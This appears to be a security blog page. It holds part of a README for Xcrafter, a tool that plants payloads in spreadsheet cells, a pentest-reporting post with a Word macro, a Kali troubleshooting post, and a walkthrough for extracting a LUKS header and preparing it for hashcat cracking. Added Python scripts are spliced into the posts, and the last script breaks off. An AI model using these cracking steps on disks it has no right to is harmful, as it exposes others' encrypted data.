<span style="background-color: black; color: white;">Download the latest release and unpack it in the desired location. Remember to install GoLang in case you want to run from the source. The Xcrafter uses the Excelize library. Check <a href="https://github.com/360EntSecGroup-Skylar/excelize/" style="box-sizing: border-box;">https://github.com/360EntSecGroup-Skylar/excelize/</a> for more information.</span></div>
<div style="box-sizing: border-box; font-size: 16px; margin-bottom: 16px;">
<span style="background-color: black; color: white;"><a href="https://github.com/crashbrz/Xcrafter/blob/master/bin" style="box-sizing: border-box;">Here</a> you can find the compiled binary.</span></div>
<h3 style="box-sizing: border-box; font-size: 1.25em; line-height: 1.25; margin-bottom: 16px; margin-top: 24px;">
<a aria-hidden="true" class="anchor" href="https://github.com/crashbrz/Xcrafter#license" id="user-content-license" style="box-sizing: border-box; float: left; line-height: 1; margin-left: -20px; padding-right: 4px;"><svg aria-hidden="true" class="octicon octicon-link" height="16" version="1.1" viewbox="0 0 16 16" width="16"><span style="background-color: black; color: white;"><path d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z" fill-rule="evenodd"></path></span></svg></a><span style="background-color: black; color: white;">License</span></h3>
<div style="box-sizing: border-box; font-size: 16px; margin-bottom: 16px;">
<span style="background-color: black; color: white;">Xcrafter is licensed under the SushiWare license. Check <a href="https://github.com/crashbrz/Xcrafter/blob/master/docs/license.txt" style="box-sizing: border-box;">docs/license.txt</a> for more information.</span></div>
<h3 style="box-sizing: border-box; font-size: 1.25em; line-height: 1.25; margin-bottom: 16px; margin-top: 24px;">
<span style="background-color: black; color: white;">Usage/Help</span></h3>
<div style="box-sizing: border-box; font-size: 16px; margin-bottom: 16px;">
<span style="background-color: black; color: white;">Please refer to the output of -h for usage information and general help. Also, you can contact me on <code style="border-radius: 6px; box-sizing: border-box; font-size: 13.6px; margin: 0px; padding: 0.2em 0.4em;">##spoonfed@freenode.org</code> (two #)</span></div>
<pre style="border-radius: 6px; box-sizing: border-box; font-size: 13.6px; line-height: 1.45; overflow-wrap: normal; overflow: auto; padding: 16px;"><code style="border-radius: 6px; border: 0px; box-sizing: border-box; display: inline; line-height: inherit; margin: 0px; overflow-wrap: normal; overflow: visible; padding: 0px; word-break: normal;"><span style="background-color: black; color: white;">Usage of Xcrafter.exe:
-c string
Column as a range where the payload will be placed. Use a colon as a range separator and a comma to add a new range. Ex: C1:F1,J7:N7,H1:K1
-e string
Use this option to set a different payload from -p option. For single cells only.
-l string
Line range of a column where the payload will be placed. Use a colon as a range separator and a comma to add a new range. Ex. A1:A10,B1:B10
-o string
Crafted file name output. (default "Xcrafter.xlsx")
-p string
Any payload to be written in the file.
-s string
Single cells where the payload will be placed. Use a comma as a separator. Ex: A1,H4,D20
-v Prints the current version and exit.
-w string
Set the worksheet name. (default "Sheet1")</span></code></pre>
<h3>Pentest reporting: Making the boring faster, easier, and more professional</h3>
<p>Published 2020-05-02.</p>
<div class="MsoNormal">
As you know, a pentester does not live only on hacking, breaking, and destroying things. </div>
<div class="MsoNormal">
<span lang="EN-US">
After these pleasant activities, the results of your job must be prepared and presented.
<br />
This is reporting time. Most technical professionals find it boring,
annoying, and repetitive. And they are right! LOL That was my motivation to
write this post.<br />
<br />
Let’s start by taking a look at Serpico. </span><a href="https://github.com/SerpicoProject/Serpico"><span lang="EN-US">https://github.com/SerpicoProject/Serpico</span></a><span lang="EN-US"> <br />
The developers named it the SimplE RePort wrIting and COllaboration tool. In my judgment,
the tool is powerful and makes the tasks incredibly easier for the professional.
</span></div>
<div class="MsoNormal">
<span lang="EN-US">Unfortunately,
like any other tool, Serpico has some limitations, such as IF statements inside a table
in the report template. For me, that did not work well. But of course, it is not a roadblock. The idea
here is <b><span style="color: red;">not</span> </b>to explain how to use Serpico; that will be your homework, since the
documentation is fully available at the link above. Pay attention to how the Serpico
META Language works in depth. <br />
<br />
Also, the text editors are your ally (or enemy) in performing this task. They
also have limitations, principally when it is necessary to manipulate tables.
Microsoft Word (in my case) is not
able to create dynamic tables, for example, conditionally formatted tables.<br />
<br />
</span></div>
<div class="MsoNormal">
<span lang="EN-US">Serpico
generates tables like this one for your report without difficulty:</span></div>
<table border="1" cellpadding="0" cellspacing="0" class="MsoTableGrid" style="border-collapse: collapse; border: none; mso-border-alt: solid windowtext .5pt; mso-padding-alt: 0cm 5.4pt 0cm 5.4pt; mso-yfti-tbllook: 1184;">
<tbody>
<tr>
<td style="background: #BFBFBF; border: solid windowtext 1.0pt; mso-background-themecolor: background1; mso-background-themeshade: 191; mso-border-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 150.25pt;" valign="top" width="200"><div align="center" class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: center;">
<span lang="EN-US" style="color: #20124d;">Vulnerability name</span></div>
</td>
<td style="background: #BFBFBF; border-left: none; border: solid windowtext 1.0pt; mso-background-themecolor: background1; mso-background-themeshade: 191; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 150.25pt;" valign="top" width="200"><div align="center" class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: center;">
<span style="color: #20124d;"><span lang="EN-US">Impact</span><span lang="EN-US"></span></span></div>
</td>
<td style="background: #BFBFBF; border-left: none; border: solid windowtext 1.0pt; mso-background-themecolor: background1; mso-background-themeshade: 191; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 150.3pt;" valign="top" width="200"><div align="center" class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: center;">
<span lang="EN-US" style="color: #20124d;">Exploitability</span><span lang="EN-US"></span></div>
</td>
</tr>
<tr>
<td style="border-top: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 150.25pt;" valign="top" width="200"><div align="center" class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: center;">
<span lang="EN-US">SQL Injection</span></div>
</td>
<td style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 150.25pt;" valign="top" width="200"><div align="center" class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: center;">
<span lang="EN-US">4</span></div>
</td>
<td style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 150.3pt;" valign="top" width="200"><div align="center" class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: center;">
<span lang="EN-US">3</span></div>
</td>
</tr>
<tr>
<td style="border-top: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 150.25pt;" valign="top" width="200"><div align="center" class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: center;">
<span lang="EN-US">Command Injection</span></div>
</td>
<td style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 150.25pt;" valign="top" width="200"><div align="center" class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: center;">
<span lang="EN-US">4</span></div>
</td>
<td style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 150.3pt;" valign="top" width="200"><div align="center" class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: center;">
<span lang="EN-US">4</span></div>
</td>
</tr>
<tr>
<td style="border-top: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 150.25pt;" valign="top" width="200"><div align="center" class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: center;">
<span lang="EN-US">Server Information Leak</span></div>
</td>
<td style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 150.25pt;" valign="top" width="200"><div align="center" class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: center;">
<span lang="EN-US">1</span></div>
</td>
<td style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 150.3pt;" valign="top" width="200"><div align="center" class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: center;">
<span lang="EN-US">8</span></div>
</td>
</tr>
</tbody></table>
<div class="MsoNormal">
<span lang="EN-US" style="color: white; mso-ansi-language: EN-US; mso-color-alt: windowtext;"><br />
</span><span lang="EN-US">Serpico stores the Impact/Risk
and Exploitability as numbers, from 0 (Informational) to 4 (Critical). <br /><br />But sometimes the template approved by your customer/company requires that the impact and the
exploitability (or whatever the field is called) be shown as the word related to the number. For example, impact 4
must be the word Critical, and exploitability 8 must be Very Easy. Also,
the cell must be colored according to a predetermined scale: for impact 1 the
cell must be blue, and for exploitability 8 it must be green. </span></div>
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0cm;">
<span lang="EN-US">For this given table, making these
changes is easy, but imagine a table with dozens of vulnerabilities. Coloring
these cells and changing the text becomes boring and annoying.<br />
<br />
To solve it, a macro is required: </span></div>
<pre><code>Sub colourExploitability()
    Dim ce As Word.Cell
    ' Only act when the cursor is inside a table
    If Selection.Information(wdWithInTable) Then
        For Each ce In Selection.Tables(1).Range.Cells
            ' Cell text ends with Word's end-of-cell marker, hence the Len - 1.
            ' Only numeric, italic cells are touched (my conditions; change them as you need).
            If IsNumeric(Left(ce.Range.Text, Len(ce.Range.Text) - 1)) And (ce.Range.Italic) Then
                If Val(ce.Range.Text) = 5 Then
                    ce.Shading.BackgroundPatternColor = RGB(192, 0, 0)
                    ce.Range.Text = "Very Easy(5)"
                End If
                If Val(ce.Range.Text) = 4 Then
                    ce.Shading.BackgroundPatternColor = wdColorRed
                    ce.Range.Text = "Easy(4)"
                End If
                If Val(ce.Range.Text) = 3 Then
                    ce.Shading.BackgroundPatternColor = wdColorOrange
                    ce.Range.Text = "Moderate(3)"
                End If
                If Val(ce.Range.Text) = 2 Then
                    ce.Shading.BackgroundPatternColor = RGB(146, 208, 80)
                    ce.Range.Text = "Difficult(2)"
                End If
                If Val(ce.Range.Text) = 1 Then
                    ce.Shading.BackgroundPatternColor = wdColorGreen
                    ce.Range.Text = "Very Difficult(1)"
                End If
                ' Anything above 5 is flagged so it stands out during review
                If Val(ce.Range.Text) > 5 Then
                    ce.Shading.BackgroundPatternColor = wdColorBlue
                    ce.Range.Text = "WRONG VALUE"
                End If
            End If
        Next
    End If
End Sub</code></pre>
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0cm;">
<br /></div>
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0cm;">
<span lang="EN-US">Basically, what this macro does is: <br />
<br />
Sweep the table.<br />
<br />
Check if the cell is numeric and italic (my conditions; of course, you can
change them): </span></div>
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0cm;">
<span lang="EN-US">If IsNumeric(Left(ce.Range.Text,
Len(ce.Range.Text) - 1)) And (<b><span style="color: red;">ce.Range.Italic</span></b>) <br />
<br />
Check if the number matches my other condition:</span></div>
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0cm;">
<span lang="EN-US"> If Val(ce.Range.Text) = 5<br />
<br />
If matched, it changes the cell value and background color:<br />
ce.Shading.BackgroundPatternColor = <b><span style="color: red;">RGB(192,
0, 0)</span></b></span></div>
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0cm;">
<span lang="EN-US"> ce.Range.Text = "Very Easy(5)"<br />
<br />
Notice that for BackgroundPatternColor it’s possible to use RGB colors, as above, or the
predefined colors listed here: </span><a href="https://docs.microsoft.com/en-us/dotnet/api/microsoft.office.interop.word.wdcolor?view=word-pia"><span lang="EN-US">https://docs.microsoft.com/en-us/dotnet/api/microsoft.office.interop.word.wdcolor?view=word-pia</span></a><br />
<br />
</div>
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0cm;">
<span lang="EN-US">Save the macro and create a shortcut
to execute it. Click on the table, press the shortcut, and watch the magic
happen. <br />
<br />
</span></div>
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0cm;">
<span lang="EN-US">Another tip to make your job faster
is to create Drop-Down List Content Controls. <br />
By default, it's not possible to add custom fields to Serpico, for example if
you need to add an OWASP category to each vulnerability. <br />
<br />
After you create this control and position it in the right place (in the
template), Serpico will generate it for each vulnerability you have added to
the report. You just need to select the proper category after the report is
generated.<br />
<br />
</span></div>
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0cm;">
<span lang="EN-US">If you are looking for more professional
documents, my friend Julio created a really great repository of public reports.
</span><span lang="EN-US"><a href="https://github.com/juliocesarfort/public-pentesting-reports">https://github.com/juliocesarfort/public-pentesting-reports</a></span> <br />
<br />
Also, thanks to my other friend Pedro, who added a chart feature (Serpico is open source).<br /><a href="https://www.linkedin.com/in/pedro-cavalcante-975a61b3">https://www.linkedin.com/in/pedro-cavalcante-975a61b3</a><br /></div>
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0cm;">
<span lang="EN-US" style="color: red;"><b>Conclusion:</b></span></div>
<span lang="EN-US" style="font-family: inherit; line-height: 107%;">After some time using Serpico and applying these
tricks, it's possible to reduce reporting time by 60-80%. That time can be
converted into cooler activities, like destroying some applications.
</span>
<h3>Kali Linux Troubleshooting – Is my issue Kali related, generic issue, or lack of knowledge?</h3>
<p>Published 2020-04-09.</p>
If you are reading this post, I presume you are a security professional or at least wanna be one. If you want to get started in security, please refer to this post: http://blog.dclabs.com.br/2016/05/wanna-be-pentester.html In this post, I will give you some tips to understand whether the issue you are facing while running Kali is a Kali issue, a generic issue, or a lack of knowledge. Also, this post is based on statistics from the Kali IRC channel: more than 75% of the questions asked on the channel are not Kali related.<br />
<br />
<br />
First of all, you must understand the Kali support policy: <br />
<br />
“While Kali Linux is a Penetration Testing Linux distribution, we do not provide penetration testing support, or even tool usage support, as some might expect. We limit our support to Kali Linux operating system and packaging issues and encourage users to search for answers to their penetration testing related issues in better suited support channels.”<br />
Source: https://www.kali.org/community/<br />
<br />
To be clear from the beginning: <b><span style="color: red;">Just because you are running Kali, it does not mean your issues are Kali related</span></b>. The people on the channel are there to help you for free. So, don't be an idiot.<br />
<br />
As you can notice, if you don’t know how to use some tool, it's not a Kali issue. Check the tool documentation. If you are too lazy to read it, jump off the boat right now. To be a good security professional there are no shortcuts. Get your ass on the chair and read! <br />
<br />
As you should know, Kali is based on Debian testing (and some packages may be imported from Debian Unstable and/or Debian Experimental). So, it is a good idea to keep a Debian testing machine installed on your VMware/VBox. The main reason for keeping it: if the issue is reproducible in Debian testing, it's clearly not a Kali-specific issue. <br />
<br />
Following are some example questions, to clear your mind before asking for help on the official Kali channels: <br />
<br />
<b>"I'm new on Kali, how to..." </b><br />
<br />
It does not matter if you are new to Kali. The only thing that matters is if you are familiar with Linux itself or not. If not: <a href="https://kali.training/">https://kali.training</a><br />
<br />
<b>"I'm trying to install libpXYX:i386, but I get unable to locate the package. The libpXYZ seems to already be installed. How can I install the 32-bit version?" </b><br />
<br />
As you can see, it's a lack of knowledge of the dpkg and apt commands. Googling the string "apt add i386 architecture", the first result gives a step-by-step guide on how to fix it. <b><span style="color: red;">So, IT'S NOT A KALI ISSUE.</span></b> <br />
<br />
<b>"Hello, I would like to analyze the incoming RDP connection on my server. How should I do?" </b><br />
<br />
It's more than clear that this question should be asked in some network forum/channel and not in the Kali channel. Kali has nothing to do with your incoming connections. <b><span style="color: red;">So, IT'S NOT A KALI ISSUE. </span></b><br />
<br />
<b>"Hi, when I run arachni it hangs before start scanning and shows some library errors. I have tested in other distros like Ubuntu, Debian and it works fine." </b><br />
<span style="color: blue;">This case seems to be a Kali issue since it happens <b>ONLY</b> in Kali! </span><br />
<br />
<b>"What is the Nmap command to enumerate shared folders?" </b><br />
<br />
As explained at the beginning of the post, "...we do not provide penetration testing support, or even tool usage support..." <b><span style="color: red;">So, IT'S NOT A KALI ISSUE. </span></b><br />
<br />
<b>"Is my wifi card Alfa Xyz123 supported by Kali?" </b><br />
<br />
As explained before, Kali is based on Debian testing. You must check if Debian supports it.<br />
<b><span style="color: blue;">If somehow, your driver works in Debian and not in Kali, then you have a Kali issue</span></b>, otherwise, <b><span style="color: red;">IT'S NOT A KALI ISSUE</span></b>.<br />
<br />
<b>"The copy and paste is not working in Kali running in Virtualbox"</b><br />
<br />
Is it not working only for Kali, or for all the other VMs too?<br />
<br />
<b>"When I execute the Metasploit against the target the shell does not open.",</b><br />
<b>How to create a user, how to change password, how to change to the text terminal, how to execute the tool, how to install..., how to remove..., how to update, the av is blocking...</b><br />
<br />
All the questions above are not relevant to the official Kali channel, since they are generic Linux questions. Kali indeed has all the setup and security tools, but in the end, it's just a Linux distribution based on Debian. <br />
<br />
If you know how to use Linux properly, these questions will disappear from your mind. <br />
<br />
<b>The best way to ask:</b><br />
But, before asking, make sure you have googled it and spent a good amount of time researching the solution or answer you are looking for.<br />
<br />
After that, provide detailed information, like steps to reproduce the issue, errors, logs (use Pastebin for them), kernel version, tool version, etc.<br />
<br />
I guess you know how to proceed from here. (:<br />
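The environment facts a support request should carry (kernel, distribution, whether the box is really Kali or another Debian derivative, and the version of the package in question) can be gathered in one go. The following Python script is an added example, not part of the original post: it parses <code>/etc/os-release</code>, reports the Debian base the way the post reasons about it, and asks <code>dpkg-query</code> for the installed package version. The <code>SAMPLE_OS_RELEASE</code> text is constructed for illustration, not captured from a real host; steps to reproduce, error messages and logs still have to be written by you.

```python
"""Collect the facts a Kali support request should contain.

Added example (not from the original post): kernel, distribution, Debian base
and package version, the items the post asks you to include in a request.
"""
import platform
import shutil
import subprocess
from pathlib import Path

# Constructed sample in /etc/os-release format (not captured from a real host).
SAMPLE_OS_RELEASE = '''PRETTY_NAME="Kali GNU/Linux Rolling"
NAME="Kali GNU/Linux"
ID=kali
ID_LIKE=debian
VERSION="2020.1"
'''


def parse_os_release(text):
    """Parse KEY=VALUE lines (values may be double-quoted) into a dict."""
    info = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        info[key.strip()] = value.strip().strip('"')
    return info


def debian_base(info):
    """'kali', 'debian' (any other Debian derivative) or 'other', from ID / ID_LIKE."""
    ids = {info.get("ID", "").lower()} | set(info.get("ID_LIKE", "").lower().split())
    if "kali" in ids:
        return "kali"
    if "debian" in ids:
        return "debian"
    return "other"


def package_version(package):
    """Installed version according to dpkg, or a reason string when it cannot be queried."""
    if shutil.which("dpkg-query") is None:
        return "dpkg-query not available (not a Debian-based system?)"
    proc = subprocess.run(["dpkg-query", "-W", "-f=${Version}", package],
                          capture_output=True, text=True)
    return proc.stdout.strip() if proc.returncode == 0 else "not installed"


def collect_report_info(package, os_release_text=None):
    """Gather everything into a dict; pass os_release_text to override /etc/os-release."""
    if os_release_text is None:
        path = Path("/etc/os-release")
        os_release_text = path.read_text() if path.exists() else ""
    osr = parse_os_release(os_release_text)
    return {
        "kernel": platform.release(),
        "distro": osr.get("PRETTY_NAME", "unknown"),
        "base": debian_base(osr),
        "package": package,
        "package_version": package_version(package),
    }


def format_report(info):
    """Render the dict as the block of text you would paste into the request."""
    return "\n".join(f"{key}: {value}" for key, value in info.items())


if __name__ == "__main__":
    # Example: describe the host and the installed nmap package
    print(format_report(collect_report_info("nmap")))
```

If <code>base</code> comes back as <code>debian</code> rather than <code>kali</code>, the question belongs on a Debian or generic Linux channel in the first place.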
<h3>Bruteforcing Linux Disk Encryption (LUKS)</h3>
<p>Published 2020-03-10.</p>
Hi guys!
I decided to write this article for a few reasons. <br />
Several articles on brute-forcing Linux disk encryption are unclear, inaccurate, or missing steps. <br />
<br />
To start this post, I will describe a scenario that happened a few months ago. <br />
A disgruntled IT contractor encrypted all of a company's virtualized servers and demanded a ransom. <br />
<br />
So let's start with the technical part. <br />
<br />
First of all, you need to identify the hypervisor used by the virtual machine, since the disk is not in RAW format. Each hypervisor has a different command to perform the conversion. In this case, let's suppose it was VirtualBox. If you try to crack the password by running hashcat directly against the VDI file, even following the hashcat documentation, it won't work.<br />
<br />
You need to convert the VDI file to RAW format first (VBox 6.1): <br />
<br />
<b>vbox-img convert --dstfilename "&lt;fullpath_of_outputfile_disk.raw&gt;" --srcfilename "&lt;fullpath_of_encrypted_file.vdi&gt;" --srcformat VDI --dstformat RAW --variant Standard
</b><br />
<br />
*Depending on the disk size, it can take a long time to finish, and there is no progress indicator during the process. You must wait until the prompt is released.<br />
<br />
Now, let's extract the encrypted partition (LUKS) from the RAW disk.<br />
<br />
<b>binwalk -D 'luks_magic:lukspartiton.raw:' disk.raw</b><br />
<br />
*Depending on the disk size, it can take a long time to finish, and there is no progress indicator during the process. You must wait until the prompt is released, or check whether the file created by binwalk already has more than 2 megabytes. As the extraction is quite fast, you will probably see a big file; that's not a problem.<br />
<br />
binwalk will create a directory named _disk.raw.extracted; inside it you can find the extracted file, whose name should be something like F500000.lukspartiton.raw<br />
<br />
After this process, according to the documentation, hashcat needs about 2 megabytes to identify everything it needs to crack the password: 4097 sectors of 512 bytes, or in other words, at least 2097664 bytes from the beginning of the RAW partition. (Reference: <a href="https://hashcat.net/forum/thread-6225.html" style="letter-spacing: 0px;">https://hashcat.net/forum/thread-6225.html</a>)<br />
<br />
<span style="letter-spacing: 0px;">You can generate this piece of the file using the famous Linux command dd, but you can also use tools like FTK or any other tool able to manipulate disk files and extract the LUKS partition. Just make sure the generated file has the appropriate headers and size at the end of the process.</span><br />
<b><br />dd if=F500000.lukspartiton.raw of=encriptedheader.crack bs=512 count=4097</b><span style="letter-spacing: 0px;">
</span><br />
<span style="letter-spacing: 0px;"><br />To check whether your piece of the file image is ready to be cracked, you can use the Linux command "file" or check with a hex editor for the string LUKS.
</span><br />
<b><br />root@Anubis:/cript# file encriptedheader.crack
</b><i><span style="letter-spacing: 0px;">encriptedheader.crack</span><span style="letter-spacing: 0px;">: LUKS encrypted file, ver 2 [, , sha256] UUID: XXXXXXXX-3d7f-4760-aec6-XXXXXXXXXXXX
</span></i><span style="letter-spacing: 0px;"><br /><br />Also, you can check by running the "strings" command</span>. The expected output should look like the following:
<br />
<b><br />root@Anubis:/cript# strings encriptedheader.crack | grep -i luks
LUKS</b>
<br />
<i>{"keyslots":{"0":{"type":"luks2","key_size":64,"af":{"type":"luks1","stripes":4000,"hash":"sha256"},"area":{"type":"raw","offset":"32768","size":"258048","encryption":"aes-xts-plain64","key_size":64},"kdf":{"type":"argon2i","time":4,"memory":713834,"cpus":2,"salt":"<REDACTED>"}}},"tokens":{},"segments":{"0":{"type":"crypt","offset":"16777216","size":"dynamic","iv_tweak":"0","encryption":"aes-xts-plain64","sector_size":512}},"digests":{"0":{"type":"pbkdf2","keyslots":["0"],"segments":["0"],"hash":"sha256","iterations":65997,"salt":"<REDACTED>","digest":"<REDACTED>"}},"config":{"json_size":"12288","keyslots_size":"16744448"}}
{"keyslots":{"0":{"type":"luks2","key_size":64,"af":{"type":"luks1","stripes":4000,"hash":"sha256"},"area":{"type":"raw","offset":"32768","size":"258048","encryption":"aes-xts-plain64","key_size":64},"kdf":{"<span style="background-color: white;">type</span>":"<span style="background-color: white;">argon2i</span>","time":4,"memory":713834,"cpus":2,"salt":"<REDACTED>"}}},"tokens":{},"segments":{"0":{"type":"crypt","offset":"16777216","size":"dynamic","iv_tweak":"0","<span style="background-color: white;">encryption</span>":"<span style="background-color: white;">aes-xts-plain64</span>","sector_size":512}},"digests":{"0":{"<span style="background-color: white;">type</span>":"<span style="background-color: white;">pbkdf2</span>","keyslots":["0"],"segments":["0"],"<span style="background-color: white;">hash</span>":"<span style="background-color: white;">sha256</span>","iterations":65997,"salt":"<REDACTED>","digest":"<REDACTED>"}},"config":{"json_size":"12288","keyslots_size":"16744448"}}</i><br />
<br />
At this point, if you have read the documentation, you can tell whether hashcat supports this disk's encryption by checking the 'encryption', 'type', and 'hash' parameters in the strings output.
<br />
Double-check the file size before starting the brute force.
<br />
<span style="letter-spacing: 0px;"><br /><b>root@Anubis:cript# ls -al </b></span>
<br />
<i>total 4604 </i><br />
<i>drwxrwx--- 1 root vboxsf 0 Mar 10 2020 . </i><br />
<i>drwxr-xr-x 3 root root 4096 Feb 23 22:00 .. </i><br />
<i>-rwxrwx--- 1 root vboxsf <span style="background-color: white;">2097664</span> Mar 10 2020 encriptedheader.crack </i><br />
<span style="letter-spacing: 0px;"><br /></span>
<span style="letter-spacing: 0px;">
Now you are sure and ready to start the cracking. </span><br />
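The three checks described above (LUKS magic and version, the 'encryption', 'type' and 'hash' parameters, and the 2097664-byte minimum size) can be done in one script instead of with file, strings and ls. The following Python is an added example, not part of the original post or of hashcat: it reads the fixed fields of a LUKS1 header or the JSON metadata area of a LUKS2 header (offsets taken from the LUKS on-disk format specifications) and reports cipher, KDF type and hash so you can compare them against hashcat's documented support for the mode you intend to use. The sample headers it builds in memory are constructed for illustration, with placeholder salts and digests, and the file name on the command line is assumed.

```python
"""Sanity-check an extracted LUKS header before running hashcat against it.

Added example (not from the original post): reads the fields the post inspects
with `file` and `strings`, plus the minimum size the post requires.
"""
import json
import struct
import sys

LUKS_MAGIC = b"LUKS\xba\xbe"
MIN_HEADER_BYTES = 2097664      # 4097 sectors * 512 bytes, what the post's dd command writes
LUKS2_BIN_HDR_SIZE = 4096       # LUKS2 binary header; the JSON metadata area follows it
LUKS1_PHDR_SIZE = 592           # LUKS1 phdr: 208 bytes of fields + 8 key slots * 48 bytes


def _cstr(buf, off, length):
    """Decode a NUL-padded fixed-width ASCII field."""
    return buf[off:off + length].split(b"\x00", 1)[0].decode("ascii", "replace")


def parse_luks_header(data):
    """Describe the LUKS header at the start of `data`; raise ValueError if it is not one."""
    if len(data) < 8 or data[:6] != LUKS_MAGIC:
        raise ValueError("no LUKS magic at offset 0: this is not the start of the LUKS partition")
    version = struct.unpack(">H", data[6:8])[0]
    info = {"version": version, "size_ok": len(data) >= MIN_HEADER_BYTES}
    if version == 1:
        # LUKS1 phdr: cipher-name @8, cipher-mode @40, hash-spec @72 (32 bytes each)
        info["encryption"] = _cstr(data, 8, 32) + "-" + _cstr(data, 40, 32)
        info["hash"] = _cstr(data, 72, 32)
        info["kdf"] = "pbkdf2"  # LUKS1 key slots always use PBKDF2
    elif version == 2:
        # Bytes 8..16: total header size (binary part + JSON area), big-endian
        hdr_size = struct.unpack(">Q", data[8:16])[0]
        meta = json.loads(data[LUKS2_BIN_HDR_SIZE:hdr_size].rstrip(b"\x00").decode("utf-8"))
        slot = meta["keyslots"]["0"]
        info["encryption"] = meta["segments"]["0"]["encryption"]
        info["kdf"] = slot["kdf"]["type"]
        info["hash"] = slot["af"]["hash"]
        info["kdf_params"] = {k: v for k, v in slot["kdf"].items() if k not in ("type", "salt")}
    else:
        raise ValueError(f"unsupported LUKS header version {version}")
    return info


# Constructed LUKS2 metadata mirroring the fields in the post's strings output
# (placeholder salts/digest; not copied from a real header).
SAMPLE_META = {
    "keyslots": {"0": {"type": "luks2", "key_size": 64,
                       "af": {"type": "luks1", "stripes": 4000, "hash": "sha256"},
                       "area": {"type": "raw", "offset": "32768", "size": "258048",
                                "encryption": "aes-xts-plain64", "key_size": 64},
                       "kdf": {"type": "argon2i", "time": 4, "memory": 713834, "cpus": 2,
                               "salt": "PLACEHOLDER"}}},
    "tokens": {},
    "segments": {"0": {"type": "crypt", "offset": "16777216", "size": "dynamic",
                       "iv_tweak": "0", "encryption": "aes-xts-plain64", "sector_size": 512}},
    "digests": {"0": {"type": "pbkdf2", "keyslots": ["0"], "segments": ["0"], "hash": "sha256",
                      "iterations": 65997, "salt": "PLACEHOLDER", "digest": "PLACEHOLDER"}},
    "config": {"json_size": "12288", "keyslots_size": "16744448"},
}


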